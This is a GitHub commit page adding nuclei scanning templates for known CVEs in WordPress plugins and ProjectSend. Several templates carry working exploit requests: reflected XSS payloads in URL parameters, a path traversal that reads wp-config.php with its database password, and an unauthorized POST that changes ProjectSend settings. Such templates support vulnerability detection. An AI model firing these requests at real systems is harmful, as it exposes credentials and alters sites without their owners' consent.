Skip to content

Commit

Permalink
20241127
Browse files Browse the repository at this point in the history
  • Loading branch information
actions-user committed Nov 27, 2024
1 parent 89d6187 commit 6100788
Show file tree
Hide file tree
Showing 289 changed files with 16,760 additions and 1 deletion.
2 changes: 1 addition & 1 deletion date.txt
Original file line number Diff line number Diff line change
@@ -1 +1 @@
20241126
20241127
287 changes: 287 additions & 0 deletions poc.txt

Large diffs are not rendered by default.

64 changes: 64 additions & 0 deletions poc/auth/projectsend-auth-bypass.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,64 @@
id: projectsend-auth-bypass

info:
name: ProjectSend <= r1605 - Improper Authorization
author: DhiyaneshDK
severity: high
description: |
An improper authorization check was identified within ProjectSend version r1605 that allows an attacker to perform sensitive actions such as enabling user registration and auto validation, or adding new entries in the whitelist of allowed extensions for uploaded files. Ultimately, this allows to execute arbitrary PHP code on the server hosting the application.
reference:
- https://www.projectsend.org/
- https://www.synacktiv.com/sites/default/files/2024-07/synacktiv-projectsend-multiple-vulnerabilities.pdf
metadata:
verified: true
max-request: 1
fofa-query: body="ProjectSend"
shodan-query: html:"ProjectSend"
tags: misconfig,projectsend,auth-bypass

variables:
string: "{{randstr}}"

flow: http(1) && http(2)

http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "projectsend")'
condition: and
internal: true

extractors:
- type: regex
name: csrf
group: 1
regex:
- 'name="csrf_token" value="([0-9a-z]+)"'
internal: true

- raw:
- |
POST /options.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
csrf_token={{csrf}}&section=general&this_install_title={{string}}
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_2, "{{string}}")'
condition: and
# digest: 4b0a00483046022100cbdf7867367646663d0f95096da7ed83173ecc5ad6edfbbb81fffd3afe8efcfa0221009cbb5bae0b46406c68174051fdff85191ee72553de70ffbb7e575a1b6c4b4aa1:922c64590222798bb761d5b6d8e72950
59 changes: 59 additions & 0 deletions poc/aws/CVE-2024-52475-3edf4604484e3bad3394912718ccec2e.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,59 @@
id: CVE-2024-52475-3edf4604484e3bad3394912718ccec2e

info:
name: >
Wawp < 3.0.18 - Unauthenticated Privilege Escalation
author: topscoder
severity: critical
description: >
The Wawp OTP Verification, Order Notifications, and Country Code Selector for WooCommerce plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to 3.0.18 (exclusive). This makes it possible for unauthenticated attackers to gain access to administrator accounts.
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/da86d422-f0ef-439b-ae67-6cb9699073e0?source=api-prod
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-52475
metadata:
fofa-query: "wp-content/plugins/automation-web-platform/"
google-query: inurl:"/wp-content/plugins/automation-web-platform/"
shodan-query: 'vuln:CVE-2024-52475'
tags: cve,wordpress,wp-plugin,automation-web-platform,critical

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/automation-web-platform/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "automation-web-platform"
part: body

- type: dsl
dsl:
- compare_versions(version, '< 3.0.18')
59 changes: 59 additions & 0 deletions poc/config/wp-ispconfig3-787a6b689d770056f7efffb5964871d1.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,59 @@
id: wp-ispconfig3-787a6b689d770056f7efffb5964871d1

info:
name: >
WP-ISPConfig 3 <= 1.5.6 - Cross-Site Request Forgery to Stored Cross-Site Scripting
author: topscoder
severity: medium
description: >
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/5b2813d6-6ef5-4629-b079-bec3ad25d661?source=api-scan
classification:
cvss-metrics:
cvss-score:
cve-id:
metadata:
fofa-query: "wp-content/plugins/wp-ispconfig3/"
google-query: inurl:"/wp-content/plugins/wp-ispconfig3/"
shodan-query: 'vuln:'
tags: cve,wordpress,wp-plugin,wp-ispconfig3,medium

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/wp-ispconfig3/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "wp-ispconfig3"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 1.5.6')
30 changes: 30 additions & 0 deletions poc/cve/CVE-2011-4624-2080.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,30 @@
id: CVE-2011-4624

info:
name: GRAND FlAGallery 1.57 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in facebook.php in the GRAND FlAGallery plugin (flash-album-gallery) before 1.57 for WordPress allows remote attackers to inject arbitrary web script or HTML via the i parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4624
tags: cve,cve2011,wordpress,xss,wp-plugin

requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
29 changes: 29 additions & 0 deletions poc/cve/CVE-2011-5181-2112.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,29 @@
id: CVE-2011-5181
info:
name: ClickDesk Live Support Live Chat 2.0 - Reflected Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5181
tags: cve,cve2011,wordpress,xss,wp-plugin
classification:
cve-id: CVE-2011-5181
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

# Enhanced by mp on 2022/02/21
33 changes: 33 additions & 0 deletions poc/cve/CVE-2013-2287-2249.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,33 @@
id: CVE-2013-2287
info:
name: WordPress Plugin Uploader 1.0.4 - Reflected Cross-Site Scripting
author: daffainfo
severity: medium
description: Multiple cross-site scripting vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2013-2287
- https://www.dognaedis.com/vulns/DGS-SEC-16.html
classification:
cve-id: CVE-2013-2287
metadata:
google-query: inurl:"/wp-content/plugins/uploader"
tags: cve,cve2013,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

# Enhanced by mp on 2022/02/21
36 changes: 36 additions & 0 deletions poc/cve/CVE-2013-7240-2289.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,36 @@
id: CVE-2013-7240

info:
name: WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter.
reference:
- https://www.exploit-db.com/exploits/38936
- https://nvd.nist.gov/vuln/detail/CVE-2013-7240
tags: cve,cve2013,wordpress,wp-plugin,lfi
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2013-7240
cwe-id: CWE-22

requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php'

matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
- "DB_HOST"
- "The base configurations of the WordPress"
part: body
condition: and

- type: status
status:
- 200
41 changes: 41 additions & 0 deletions poc/cve/CVE-2014-4536-2351.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,41 @@
id: CVE-2014-4536

info:
name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected Cross-Site Scripting
author: daffainfo
severity: medium
description: Multiple cross-site scripting vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter.
reference:
- https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f
- https://nvd.nist.gov/vuln/detail/CVE-2014-4536
- http://wordpress.org/plugins/infusionsoft/changelog
- http://codevigilant.com/disclosure/wp-plugin-infusionsoft-a3-cross-site-scripting-xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2014-4536
cwe-id: CWE-79
tags: cve,cve2014,wordpress,wp-plugin,xss

requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"

matchers-condition: and
matchers:
- type: word
words:
- '"></script><script>alert(document.domain)</script>'
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200

# Enhanced by mp on 2022/02/24
27 changes: 27 additions & 0 deletions poc/cve/CVE-2015-6920-2583.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,27 @@
id: CVE-2015-6920
info:
name: sourceAFRICA <= 0.1.3 - Unauthenticated Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: WordPress sourceAFRICA plugin version 0.1.3 suffers from a cross site scripting vulnerability.
reference:
- https://packetstormsecurity.com/files/133371/
- https://nvd.nist.gov/vuln/detail/CVE-2015-6920
tags: cve,cve2015,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '"></script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
Loading

0 comments on commit 6100788

Please sign in to comment.